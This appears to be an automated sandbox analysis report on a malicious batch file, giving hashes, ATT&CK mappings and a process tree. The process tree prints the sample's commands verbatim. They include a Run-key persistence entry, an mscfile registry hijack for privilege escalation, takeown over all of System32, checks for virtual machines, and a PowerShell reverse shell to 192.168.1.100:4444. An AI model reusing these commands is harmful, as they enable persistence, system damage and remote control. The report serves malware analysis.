396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

Analysis

max time kernel
147s
max time network
146s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
08/09/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

1c63745d54962d205bb3ae879bea1ed4
SHA1

a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256

396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512

129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP

96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Score

7^/10

discovery execution persistence

Malware Config

Signatures

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4204	takeown.exe
4732	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1308	powershell.exe
2492	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1940	timeout.exe
1136	timeout.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1996	systeminfo.exe
4132	systeminfo.exe
744	systeminfo.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	cmd.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
1308	powershell.exe
1308	powershell.exe
1308	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeTakeOwnershipPrivilege	4732	takeown.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeTakeOwnershipPrivilege	4204	takeown.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4664 wrote to memory of 3096	4664	cmd.exe	74
PID 4664 wrote to memory of 3096	4664	cmd.exe	74
PID 4664 wrote to memory of 2492	4664	cmd.exe	75
PID 4664 wrote to memory of 2492	4664	cmd.exe	75
PID 4664 wrote to memory of 1940	4664	cmd.exe	76
PID 4664 wrote to memory of 1940	4664	cmd.exe	76
PID 4664 wrote to memory of 1964	4664	cmd.exe	77
PID 4664 wrote to memory of 1964	4664	cmd.exe	77
PID 4664 wrote to memory of 3328	4664	cmd.exe	78
PID 4664 wrote to memory of 3328	4664	cmd.exe	78
PID 4664 wrote to memory of 1136	4664	cmd.exe	81
PID 4664 wrote to memory of 1136	4664	cmd.exe	81
PID 3328 wrote to memory of 4732	3328	cmd.exe	82
PID 3328 wrote to memory of 4732	3328	cmd.exe	82
PID 4664 wrote to memory of 2484	4664	cmd.exe	83
PID 4664 wrote to memory of 2484	4664	cmd.exe	83
PID 4664 wrote to memory of 1996	4664	cmd.exe	84
PID 4664 wrote to memory of 1996	4664	cmd.exe	84
PID 4664 wrote to memory of 404	4664	cmd.exe	85
PID 4664 wrote to memory of 404	4664	cmd.exe	85
PID 4664 wrote to memory of 4132	4664	cmd.exe	88
PID 4664 wrote to memory of 4132	4664	cmd.exe	88
PID 4664 wrote to memory of 4244	4664	cmd.exe	89
PID 4664 wrote to memory of 4244	4664	cmd.exe	89
PID 4664 wrote to memory of 744	4664	cmd.exe	90
PID 4664 wrote to memory of 744	4664	cmd.exe	90
PID 4664 wrote to memory of 1484	4664	cmd.exe	91
PID 4664 wrote to memory of 1484	4664	cmd.exe	91
PID 4664 wrote to memory of 1308	4664	cmd.exe	92
PID 4664 wrote to memory of 1308	4664	cmd.exe	92
PID 4664 wrote to memory of 4584	4664	cmd.exe	93
PID 4664 wrote to memory of 4584	4664	cmd.exe	93
PID 4664 wrote to memory of 4204	4664	cmd.exe	94
PID 4664 wrote to memory of 4204	4664	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4664
- C:\Windows\system32\mode.com
  mode con: cols=800 lines=60
  2⤵
  PID:3096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2492
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1940
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
  2⤵
  - Modifies registry class
  PID:1964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3328
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4732
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1136
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Software\Classes\mscfile" /f
  2⤵
  - Modifies registry class
  PID:2484
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:1996
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox"
  2⤵
  PID:404
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4132
- C:\Windows\system32\findstr.exe
  findstr /i "VMware"
  2⤵
  PID:4244
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:744
- C:\Windows\system32\findstr.exe
  findstr /i "Hyper-V"
  2⤵
  PID:1484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
  2⤵
  - Adds Run key to start application
  PID:4584
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\System32\* /r /d y
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad24b88758d81706886a3b4a0f8e7573

SHA1
907a8d47973c5d1371cc696216cce9002c421311

SHA256
9039dfb2a9c4c27da494ed9cf21541a7b021ce310ffeaa89f36703f4642a9bb3

SHA512
b94b8c8bf61c76e6a4967cb5859ca0f6f65a6373434594b2a984c18aefa7c7719097a602f6a760fb09902f4ed1f0b33c4662ccfb38a09eba820170d15a830030

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgdm23tg.xww.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

Filesize
285B

MD5
4577f08330df24a350ff523ec87bf38e

SHA1
5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

SHA256
5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

SHA512
ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

Download Submit
memory/2492-0-0x00007FFA11D53000-0x00007FFA11D54000-memory.dmp

Filesize
4KB

Download
memory/2492-5-0x0000029CFADD0000-0x0000029CFADF2000-memory.dmp

Filesize
136KB

Download
memory/2492-6-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

Filesize
9.9MB

Download
memory/2492-10-0x0000029CFAF80000-0x0000029CFAFF6000-memory.dmp

Filesize
472KB

Download
memory/2492-9-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

Filesize
9.9MB

Download
memory/2492-28-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

Filesize
9.9MB

Download